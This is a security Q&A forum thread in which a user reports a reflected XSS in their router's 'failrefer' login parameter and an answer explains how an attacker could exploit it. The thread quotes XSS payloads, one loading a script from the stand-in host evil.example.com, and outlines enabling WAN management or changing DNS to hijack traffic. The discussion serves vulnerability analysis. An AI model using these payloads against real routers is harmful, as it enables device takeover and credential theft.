# A possible router XSS vulnerability

Tags: xss, router

I have been trying to analyze my router modem and see how it works
and check for possible vulnerabilities in  the system .
and i would like some help .

Router Security Research :

```
router access ip : 192.168.1.1
```

first the web server do a check :

```
if (user_level == -1) {
    location.href = "admin.html";
//if user_level == -1 // get him back to the login page
```

the web server get the " user_level " from a javascript file .

```
location : http://192.168.1.1/users.sjs
var currentUser = "error"; var user_level = -1;
```

i don't know how the web server can send values to this script ! is this script have global variables ?

if the login is succesfull : the javascript file values :

```
location : http://192.168.1.1/users.sjs
var currentUser = "technicolor"; var user_level = 15; 

/// current user check :
if (currentUser == "technicolor") {
        location.href = "thomson/index.html";
    }
```

so the web server give acces if the users.sjs have technicolor and 15 as variables values !

the login page send a POST request to this file :

```
POST /cgi-bin/basicauth.cgi?index.html HTTP/1.1
```

one of the request variables is `failrefer` if the login failed he will redirect him to `/admin.html`
and i found that this post variable have an `XSS vulnerability` :

```
&failrefer=/admin.html</script><script>confirm(1)</script>
```

---

i really want to know what you think ! is there a way that someone can access my router control panel if he found these vulnerability !
thanks :)

Comment: So the confirmation box appears with that attack?

Comment: yes ! a javascript box ! is there a way to send values to a global variables with the script ?

Comment: Still don't see how this XSS is possible without you being LOGGED in to your router first. Most people don't login to their router when they surf

Comment: This authentication mechanism could be broken by design since the checks for redirection seems to be done in JavaScript. If the authentication can be bypassed, you maybe have a bigger problem than XSS.

Comment: i tried to install "NoRedirect" addon on firefox ! so he don't get me back on the admin.html login page .. but the problem he always check for that " user_level" value ! when he find that the value have "-1" he get me back to login ! :S

Answer (score 2):

Yes they could control your router with that vulnerability.

Even if there's a limit to the length of the `failrefer` parameter, an attacker could host a script that can execute router functions on `http://evil.example.com/attack_router.js` and then trick you into visiting

```
&failrefer=/admin.html</script><script src="http://evil.example.com/attack_router.js"></script>
```

somehow. For example, by sending you phishing links or by sending emails appearing to come from your known contacts (if this was any targeted attack).

However, you would have to either be logged into your router already (and I'm assuming a call to the URL above won't log you out), or have your router configured with default or weak credentials.

All the `attack_router.js` script would need to do is make POST requests to router configuration pages. For example, to the remote login page to enable HTTP management on the WAN side. The attacker, knowing your IP from the request to their `evil.example.com` domain can simply then log into your router.

Other example attacks would be using the DNS configuration page to change your DNS to one that is under control of the attacker. Then they could redirect you to their own systems to attempt to capture your credentials (e.g. an sslstrip style attack).

Comment: I haven't quite grasped this issue yet... however, I thought modern browsers prevented or prompted cross-zone (internet<->intranet) usage.

Comment: @SilverlightFox, this would have been possible years back, but wouldn't you agree that most browsers now flag that url you posted with the "src=" as XSS

Comment: i tried to do an html post with the variables ! and like you said if it will send a username and password as parameters ! it makes you logout because you typed a wrong password , and the user will lose the session !

Comment: @mohamed-abshir: There are various ways to [evade these filters](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet). These change depending on browser, OS and revision. Don't rely on them to protect you all of the time - they are a band aid to protect users from vulnerable sites. The real responsibility lies with the website operator (or in this case the router vendor).